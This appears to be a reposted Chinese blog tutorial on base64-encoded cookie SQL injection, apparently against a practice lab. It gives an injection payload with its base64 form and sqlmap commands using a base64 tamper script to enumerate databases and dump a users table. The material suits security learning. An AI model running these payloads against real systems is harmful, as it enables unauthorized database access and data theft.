MySQL Cookie Base64注入

MySQL Cookie Base64注入,第1张

MySQL Cookie Base64注入 MySQL cookie base64注入 1.base64介绍

base64编码是从二进制到字符的过程,可用于在HTTP环境下传递较长的标识信息。base64是网络上最常见的用于8Bit字节码的编码方式之一,base64就是一种基于64个可打印字符来表示二进制数据的方法。

将原始内容转换为二进制,从左到右一次取6位,然后在最高位补两位0,形成新的内容。

编码规则:
(1)把3个字符变成4个字符。
(2)每76个字符加一个换行符。
(3)最后的结束符也要处理。

2.cookie base64注入代码分析

base64_decode(str):PHP语言中用于解密base64加密字符串的函数。

3.cookie base64注入

使用base64加密的注入语句,插入到cookie对应的位置完成SQL注入漏洞的探测
明文:' or 1=1#
密文:JyBvciAxPTE=

进行抓包

进行重放攻击

可以看到,cookie中的uname内容为base64编码,进行admin测试

可以看到回显的报错

后续 *** 作,只需将我们要执行的SQL语句进行base64加密即可,这里就不在赘述。
若还有不懂的,请查看我的另外一篇博客
https://blog.csdn.net/m_de_g/article/details/121783580?spm=1001.2014.3001.5501

4.Sqlmap渗透测试

1.抓包复制其内容,并且在cookie的位置加上星号(*)

2.爆破数据库

python2 sqlmap.py -r "1.txt" --level 3 --batch


3.如果不加上参数的话会出现,报错

python2 sqlmap.py -r "1.txt" --level 3 --batch --tamper base64encode.py --dbs


4.爆破数据表

python2 sqlmap.py -r "1.txt" --level 3 --batch --tamper base64encode.py -D security --tables


5.获取字段名及内容

python2 sqlmap.py -r "1.txt" --level 3 --batch --tamper base64encode.py -D security -T users --dump

欢迎分享,转载请注明来源:内存溢出

原文地址:https://54852.com/zaji/5651924.html

(0)
打赏 微信扫一扫微信扫一扫 支付宝扫一扫支付宝扫一扫
上一篇 2022-12-16
下一篇2022-12-16

发表评论

登录后才能评论

评论列表(0条)

    保存